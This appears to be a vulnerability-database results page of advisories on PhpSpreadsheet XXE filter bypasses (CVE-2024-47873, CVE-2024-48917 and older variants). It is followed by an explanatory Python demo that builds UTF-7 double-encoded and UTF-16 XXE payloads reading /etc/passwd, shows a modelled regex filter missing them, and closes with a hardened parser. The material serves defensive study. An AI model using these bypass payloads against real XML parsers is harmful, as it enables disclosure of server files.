
26 matches found

EUVD
added 2025/10/03 8:07 p.m.

EUVD-2024-3279

Malicious code in bioql PyPI...

CVSS 7.5, AI score 6.3, EPSS 0.00173
Exploits 1, References 6
Snyk
added 2024/11/18 8:42 p.m.

XML External Entity (XXE) Injection

Overview Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the scan method in the XmlScanner class. Exploiting this vulnerability is possible when using a UTF-7 encoded payload, including at the end of the file a comment with the value encoding="UTF-8" with...

CVSS 8.7, AI score 7.3, EPSS 0.00173
Exploits 1, References 2
NVD
added 2024/11/18 8:15 p.m.

CVE-2024-48917

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current...

CVSS 7.5, EPSS 0.00173
Exploits 1, References 3
GitHub Security Blog
added 2024/11/18 8:01 p.m.

XXE in PHPSpreadsheet's XLSX reader

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, we found another bypass besides the previously reported CVE-2024-47873: the regexes from the findCharSet method, which is used for determining the current encoding, can be bypassed by using a payload in the...

CVSS 7.5, AI score 7.5, EPSS 0.00173
Exploits 1, References 5, Affected Software 2
OSV
added 2024/11/18 8:01 p.m.

GHSA-7CC9-J4MV-VCJP XXE in PHPSpreadsheet's XLSX reader

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, we found another bypass besides the previously reported CVE-2024-47873: the regexes from the findCharSet method, which is used for determining the current encoding, can be bypassed by using a payload in the...

CVSS 7.5, AI score 7.5, EPSS 0.00173
Exploits 1, References 5
OSV
added 2024/11/18 8:01 p.m.

GHSA-JW4X-V69F-HH5W XmlScanner bypass leads to XXE

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in . Details The scan method converts the input to UTF-8 if it is...

CVSS 7.5, AI score 7.5, EPSS 0.00173
Exploits 1, References 6
GitHub Security Blog
added 2024/11/18 8:01 p.m.

XmlScanner bypass leads to XXE

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in . Details The scan method converts the input to UTF-8 if it is...

CVSS 7.5, AI score 7.5, EPSS 0.00173
Exploits 1, References 6, Affected Software 2
CVE
added 2024/11/18 7:48 p.m.

CVE-2024-48917

CVE-2024-48917 (PhpSpreadsheet XXE bypass): The XmlScanner in PhpSpreadsheet can be bypassed via the encoding detection logic (findCharSet) when processing XML with UTF-7 payloads, allowing an XML External Entity attack. A comment injection at the end of the file encoding tag (e.g., encoding="UT...

CVSS 7.5, AI score 7.5, EPSS 0.00173
Exploits 1, References 3, Affected Software 1
Cvelist
added 2024/11/18 7:48 p.m.

CVE-2024-48917 XXE in PHPSpreadsheet's XLSX reader

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current...

CVSS 7.5, EPSS 0.00173
Exploits 1, References 3
Snyk
added 2024/11/18 5:41 p.m.

XML External Entity (XXE) Injection

Overview phpoffice/phpspreadsheet is a spreadsheet engine that reads, creates and writes spreadsheet documents in PHP. Affected versions of this package are vulnerable to XML External Entity (XXE) Injection due to the usage of improperly secured regular expressions in the scan and findCharSet methods...

CVSS 8.7, AI score 7.6, EPSS 0.00173
Exploits 1, References 2
Snyk
added 2024/11/18 5:41 p.m.

XML External Entity (XXE) Injection

Overview Affected versions of this package are vulnerable to XML External Entity (XXE) Injection due to the usage of improperly secured regular expressions in the scan and findCharSet methods of the XmlScanner class. By exploiting UCS-4 encoding and encoding guessing techniques, attackers can...

CVSS 8.7, AI score 7.2, EPSS 0.00173
Exploits 1, References 2
NVD
added 2024/11/18 5:15 p.m.

CVE-2024-47873

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

CVSS 7.5, EPSS 0.00173
Exploits 1, References 4
Vulnrichment
added 2024/11/18 5:03 p.m.

CVE-2024-47873 PhpSpreadsheet XmlScanner bypass leads to XXE

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

CVSS 7.5, AI score 7.2, EPSS 0.00173
Exploits 1, References 4
CVE
added 2024/11/18 5:03 p.m.

CVE-2024-47873

PhpSpreadsheet's XML scanner contains a bypass that can enable XML External Entity (XXE) attacks. The findCharSet/scan logic can be bypassed by encoding tricks (e.g., UCS-4, UTF-7) and encoding guessing, allowing sanitizers to be circumvented. Affected versions are prior to 1.9.4, 2.1.3, 2.3.2, a...

CVSS 7.5, AI score 7.4, EPSS 0.00173
Exploits 1, References 4, Affected Software 1
OSV
added 2024/11/18 5:03 p.m.

CVE-2024-47873 PhpSpreadsheet XmlScanner bypass leads to XXE

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

CVSS 7.5, AI score 6.6, EPSS 0.00173
Exploits 1, References 6
Positive Technologies
added 2024/11/18 12:00 a.m.

PT-2024-32865

Name of the Vulnerable Software and Affected Versions: PhpSpreadsheet versions prior to 1.9.4, 2.1.3, 2.3.2, and 3.4.0. Description: The XmlScanner class in PhpSpreadsheet has a scan method that is intended to prevent XXE attacks. However, the regexes used in the scan method and the findCharSet meth...

CVSS 7.5, AI score 5.8, EPSS 0.00173
Exploits 1, References 15
Snyk
added 2024/10/07 3:58 p.m.

XML External Entity (XXE) Injection

Overview phpoffice/phpspreadsheet is a spreadsheet engine that reads, creates and writes spreadsheet documents in PHP. Affected versions of this package are vulnerable to XML External Entity (XXE) Injection through the toUtf8 function in the XmlScanner.php file. An attacker can disclose server files...

CVSS 8.7, AI score 7.4, EPSS 0.71632
Exploits 1, References 2
SUSE CVE
added 2023/02/15 6:03 a.m.

SUSE CVE-2009-2625

XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as...

CVSS 5.0, AI score 8.5, EPSS 0.01044
Exploits 2, References 27
GitHub Security Blog
added 2019/11/20 1:39 a.m.

XXE in PHPSpreadsheet due to incomplete fix for previous encoding issue

PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to UTF-8 if an encoding other than UTF-8 is declared in the header. This was a security measure to prevent CVE-2018-19277, but the fix is not sufficient. By double-encoding the xml...

CVSS 8.8, AI score 1.5, EPSS 0.00122
Exploits 4, References 8, Affected Software 2
OSV
added 2019/11/20 1:39 a.m.

GHSA-VVWV-H69M-WG6F XXE in PHPSpreadsheet due to incomplete fix for previous encoding issue

PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to UTF-8 if an encoding other than UTF-8 is declared in the header. This was a security measure to prevent CVE-2018-19277, but the fix is not sufficient. By double-encoding the xml...

CVSS 8.8, AI score 8.5, EPSS 0.00122
Exploits 4, References 8
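The entries above describe the same class of failure from three angles: a byte-level regex filter that looks for entity declarations, beaten by UCS-4 input whose encoding the parser guesses from the leading bytes (the CVE-2024-47873 entries), by UTF-7 input that hides markup inside base64 blocks (the CVE-2024-48917 entries), and by the 2019 double-encoding variant where the filter's single transcoding pass still leaves the DTD encoded for the parser's own pass (the GHSA-VVWV-H69M-WG6F entries). The Python example below is added here to show that divergence with a constructed scanner; it is not PhpSpreadsheet's XmlScanner, its regexes are not the library's, and the function names (naive_scan, utf7_block, double_encoded_utf7_payload, utf16_payload, entities_seen_by_expat, hardened_parse) and sample documents are assumptions made for illustration. It uses UTF-16 where the advisories say UCS-4 because Python's expat decodes UTF-16 natively; the mechanism, an encoding detected from the first bytes rather than from anything a byte regex can see, is the same.

```python
"""Added example (not PhpSpreadsheet's code): a regex pre-scan of raw XML
bytes for "<!ENTITY" versus what the XML parser actually decodes.

All names and documents are constructed for illustration. naive_scan models
the general pattern the advisories describe (sniff the declared charset with
a regex, transcode to UTF-8 once, regex the text for entity markup); it is
not a copy of XmlScanner and its regexes are not PhpSpreadsheet's.
"""
import base64
import re
from xml.parsers import expat

DECL_UTF7 = '<?xml version="1.0" encoding="UTF-7"?>'
DTD_AND_BODY = ('<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                '<r>&xxe;</r>')
XXE_DOC = '<?xml version="1.0"?>' + DTD_AND_BODY      # constructed sample

ENCODING_RE = re.compile(rb'encoding=["\']([A-Za-z0-9._-]+)["\']')
DANGEROUS_RE = re.compile(r'<!(ENTITY|DOCTYPE)', re.IGNORECASE)


def naive_scan(data: bytes) -> tuple:
    """Modelled filter: guess charset by regex, decode once, regex the text.
    Returns (looks_safe, text that would be handed on to the real parser)."""
    m = ENCODING_RE.search(data)
    charset = m.group(1).decode("ascii") if m else "utf-8"
    try:
        text = data.decode(charset)
    except (LookupError, UnicodeDecodeError):
        text = data.decode("utf-8", errors="replace")
    return DANGEROUS_RE.search(text) is None, text


def utf7_block(text: str) -> str:
    """One UTF-7 base64 block (+...-) covering every character. Python's own
    utf-7 encoder leaves '<', '!' and '"' in the clear, so the block is built
    by hand, the way an attacker hides markup from a byte-level regex."""
    b64 = base64.b64encode(text.encode("utf-16-be")).decode("ascii")
    return "+" + b64.rstrip("=") + "-"


def double_encoded_utf7_payload() -> bytes:
    """Double encoding: the declaration stays ASCII so both the filter and the
    parser select UTF-7; the DTD is wrapped in a UTF-7 block and that block is
    wrapped again. The filter's one decode yields base64 noise, the parser's
    own decode of the declared encoding yields the DTD."""
    inner = utf7_block(DTD_AND_BODY)
    return (DECL_UTF7 + utf7_block(inner)).encode("ascii")


def utf16_payload() -> bytes:
    """BOM-prefixed UTF-16 (UCS-4 is the same trick with 4-byte units): a byte
    regex sees no 'encoding=' and no '<!ENTITY', the parser reads the BOM."""
    return XXE_DOC.encode("utf-16")


def entities_seen_by_expat(data: bytes) -> list:
    """Entity names expat declares while parsing with its own encoding
    detection. External references are acknowledged but never fetched."""
    seen = []
    p = expat.ParserCreate()
    p.EntityDeclHandler = lambda name, *_: seen.append(name)
    p.ExternalEntityRefHandler = lambda *_: 1        # 1 = handled, fetch nothing
    p.Parse(data, True)
    return seen


def hardened_parse(data: bytes) -> bool:
    """Enforce the policy inside the parser instead of on raw bytes: refuse
    any DOCTYPE on the decoded token stream, whatever the transport encoding,
    and treat anything the parser cannot decode as rejected."""
    def reject(*_):
        raise ValueError("DOCTYPE not allowed")
    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject
    p.ExternalEntityRefHandler = lambda *_: 1
    try:
        p.Parse(data, True)
    except (ValueError, expat.ExpatError):
        return False
    return True


if __name__ == "__main__":
    u7 = double_encoded_utf7_payload()
    safe, once = naive_scan(u7)
    print("UTF-7 double-encoded: filter says safe =", safe)
    print("  parser's second decode:", once.encode("ascii").decode("utf-7")[:58])
    u16 = utf16_payload()
    print("UTF-16 + BOM: filter says safe =", naive_scan(u16)[0],
          "| expat declares", entities_seen_by_expat(u16))
    print("hardened_parse(UTF-16 payload):", hardened_parse(u16))
    print("hardened_parse(<r>ok</r>):", hardened_parse(b"<r>ok</r>"))
```

Run as a script, the modelled filter reports both payloads as clean, expat declares the xxe entity on the UTF-16 document, and a second UTF-7 decode of the filter's own output reproduces the DTD. hardened_parse moves the check into the parser, which is the only place the bytes have been decoded the way the parser will read them; in PHP the same idea is to let libxml enforce it (reject documents that carry a DOCTYPE, and never pass LIBXML_NOENT or LIBXML_DTDLOAD) rather than to pre-scan bytes with a regex.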